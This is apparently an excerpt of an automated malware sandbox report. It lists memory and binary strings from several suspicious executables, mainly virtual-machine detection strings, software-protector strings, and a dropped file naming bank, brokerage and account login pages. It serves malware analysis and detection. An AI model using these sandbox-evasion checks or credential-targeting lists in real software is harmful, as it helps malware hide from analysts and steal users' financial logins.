Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V (core)
Source: explorti.exe, 0000000B.00000002.2552429167.00000000015A4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Gu4f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_C
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Enterprise without Hyper-V (core)
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: (Windows 2012 R2 Microsoft Hyper-V Server
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Microsoft Hyper-V Server
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 6Windows 2012 R2 Server Standard without Hyper-V (core)
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (core)
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (core)
Source: Amcache.hve.7.dr Binary or memory string: vmci.sys
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 0Windows 8 Server Standard without Hyper-V (core)
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 6Windows 8.1 Essential Server Solutions without Hyper-V
Source: KKFHJJDH.0.dr Binary or memory string: global block list test formVMware20,11696492231
Source: 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: vmware
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8 Essential Server Solutions without Hyper-V
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (full)
Source: KKFHJJDH.0.dr Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Essential Server Solutions without Hyper-V
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (full)
Source: Amcache.hve.7.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.7.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.7.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.7.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.7.dr Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: "Windows 8 Microsoft Hyper-V Server
Source: KKFHJJDH.0.dr Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (full)
Source: KKFHJJDH.0.dr Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: explorti.exe, explorti.exe, 0000000C.00000002.1604346648.0000000000DEA000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 00000011.00000002.2244960361.0000000000DEA000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (full)
Source: KKFHJJDH.0.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: Amcache.hve.7.dr Binary or memory string: VMware Virtual USB Mouse
Source: KKFHJJDH.0.dr Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Microsoft Hyper-V Server
Source: KKFHJJDH.0.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: Amcache.hve.7.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (core)
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: KKFHJJDH.0.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Standard without Hyper-V (core)
Source: KKFHJJDH.0.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Essential Server Solutions without Hyper-V
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V (core)
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Hyper-V (guest)
Source: Amcache.hve.7.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Essential Server Solutions without Hyper-V
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Microsoft Hyper-V Server
Source: KKFHJJDH.0.dr Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: Amcache.hve.7.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.7.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.000000000103C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.00000000011AC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ~VirtualMachineTypes
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.000000000103C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.00000000011AC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ]DLL_Loader_VirtualMachine
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Microsoft Hyper-V Server
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.000000000103C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.00000000011AC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: /Windows 2012 R2 Server Standard without Hyper-V
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Standard without Hyper-V
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: )Windows 8 Server Standard without Hyper-V
Source: GHCGDAFCFH.exe, 00000009.00000002.1557327275.000000000086A000.00000040.00000001.01000000.00000009.sdmp, explorti.exe, 0000000B.00000002.2550243453.0000000000DEA000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000C.00000002.1604346648.0000000000DEA000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 00000011.00000002.2244960361.0000000000DEA000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Enterprise without Hyper-V (full)
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (core)
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Datacenter without Hyper-V (full)
Source: KKFHJJDH.0.dr Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (core)
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: %Windows 2012 Microsoft Hyper-V Server
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Hyper-V
Source: Amcache.hve.7.dr Binary or memory string: VMware
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: $Windows 8.1 Microsoft Hyper-V Server
Source: KKFHJJDH.0.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ,Windows 2012 Server Standard without Hyper-V
Source: KKFHJJDH.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (full)
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Microsoft Hyper-V Server
Source: KKFHJJDH.0.dr Binary or memory string: outlook.office.comVMware20,11696492231s
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (core)
Source: KKFHJJDH.0.dr Binary or memory string: AMC password management pageVMware20,11696492231
Source: Amcache.hve.7.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: KKFHJJDH.0.dr Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: KKFHJJDH.0.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Essential Server Solutions without Hyper-V
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Essential Server Solutions without Hyper-V
Source: Zachv5lCuu.exe, 00000000.00000002.1506072996.0000000002019000.00000004.00000020.00020000.00000000.sdmp, Zachv5lCuu.exe, 00000000.00000002.1506072996.0000000001FEC000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000B.00000002.2552429167.0000000001552000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000B.00000002.2552429167.0000000001594000.00000004.00000020.00020000.00000000.sdmp, 25bb638aac.exe, 0000000D.00000002.1636866589.0000000001CA9000.00000004.00000020.00020000.00000000.sdmp, 25bb638aac.exe, 0000000D.00000002.1636866589.0000000001C7D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V (core)
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (core)
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: KKFHJJDH.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: KKFHJJDH.0.dr Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 7Windows 2012 Essential Server Solutions without Hyper-V
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.7.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (core)
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (full)
Source: KKFHJJDH.0.dr Binary or memory string: discord.comVMware20,11696492231f
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (full)
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: %Windows 2016 Microsoft Hyper-V Server
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (full)
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (core)
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (core)
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 7Windows 2016 Essential Server Solutions without Hyper-V
Source: KKFHJJDH.0.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: +Windows 8.1 Server Standard without Hyper-V
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V
Source: KKFHJJDH.0.dr Binary or memory string: tasks.office.comVMware20,11696492231o
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (core)
Source: Amcache.hve.7.dr Binary or memory string: VMware20,1
Source: Amcache.hve.7.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: 25bb638aac.exe, 0000000D.00000002.1636866589.0000000001C3E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: KKFHJJDH.0.dr Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.7.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: KKFHJJDH.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: Amcache.hve.7.dr Binary or memory string: VMware VMCI Bus Device
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Datacenter without Hyper-V (core)
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (full)
